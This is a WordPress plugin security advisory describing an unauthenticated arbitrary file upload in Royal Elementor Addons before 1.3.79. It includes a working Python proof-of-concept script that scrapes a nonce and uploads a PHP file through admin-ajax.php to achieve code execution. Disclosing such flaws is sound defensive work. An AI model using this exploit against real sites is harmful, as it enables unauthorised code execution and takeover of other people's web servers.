WordPress Plugin Vulnerabilities
Royal Elementor Addons and Templates < 1.3.79 - Unauthenticated Arbitrary File Upload
Description
The plugin does not properly validate uploaded files, which could allow unauthenticated users to upload arbitrary files, such as PHP and achieve RCE.
Proof of Concept
Make sure you have Elementor installed and a page or post edited with Elementor. Here's the python script that will execute the exploit. from io import StringIO import requests from urllib import parse import json import sys import re import io if len(sys.argv) != 2: print('USAGE: python %s <target_elementor_page>' % (sys.argv[0],)) sys.exit() elementor_url = sys.argv[1].rstrip('/') parsed_url = parse.urlparse(elementor_url) root_url = f'{parsed_url.scheme}://{parsed_url.netloc}' with requests.Session() as s: print('# Getting nonce..') page = s.get(elementor_url).text nonce = re.search(r'WprConfig = \{.*"nonce":"([a-f0-9]+)"', page).groups() if len(nonce) == 0: print('Error: Couldn\'t get nonce.') sys.exit() nonce = nonce[0] print('# Uploading shell..') shell = io.BytesIO(b'<?php phpinfo();') data = { 'wpr_addons_nonce': nonce, 'max_file_size': 100, 'allowed_file_types': ',', 'action': 'wpr_addons_upload_file', 'triggering_event': 'click', } file = { 'uploaded_file': ('phpinfo.php.', shell), } print(requests.post(f'{root_url}/wp-admin/admin-ajax.php', data=data, files=file).text)
Affects Plugins
References
CVE
Miscellaneous
Original Researcher
Fioravante Souza
Submitter
Fioravante Souza
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2023-10-09 (about 7 months ago)
Added
2023-10-09 (about 7 months ago)
Last Updated
2023-10-09 (about 7 months ago)